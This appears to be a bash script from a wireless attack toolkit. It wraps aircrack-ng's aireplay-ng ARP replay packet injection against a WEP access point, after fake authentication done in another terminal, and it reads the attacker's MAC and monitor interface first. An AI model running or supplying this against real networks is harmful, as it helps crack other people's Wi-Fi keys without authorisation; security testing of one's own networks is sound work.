#! /bin/bash
WLANNM=$(cat /root/lscript/wlanmon.txt)
export WLANNM
while true
do
	echo -e "----------------------\e[1;33mPacket injection\e[0m-----------------------"
	echo -e "You need to do the Fake-authentication first!(on the other terminal)"
	if [ "$FIRSTT" = "1" ]
	then
		aireplay-ng -3 -b $WEPB -h $MYMAC $WLANNM
	else
		echo -e "Press \e[1;33many key\e[0m to start fake authentication..."
		read
		echo -e "Getting you MAC...."
		sleep 1
		MYMAC=$(ifconfig $WLANNM | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}')
		echo -e "Your MAC is $MYMAC"
		sleep 1
		echo -e "Starting packet injection..."
		sleep 1
		FIRSTT="1"
		aireplay-ng -3 -b $WEPB -h $MYMAC $WLANNM
	fi
	echo -e "Inject packets again?(\e[1;33my\e[0m/\e[1;33mn\e[0m)(\e[1;33mEnter\e[0m=yes): "
	read REF
	if [ "$REF" = "n" ]
	then
		exit
	else
		clear
		continue
	fi
done
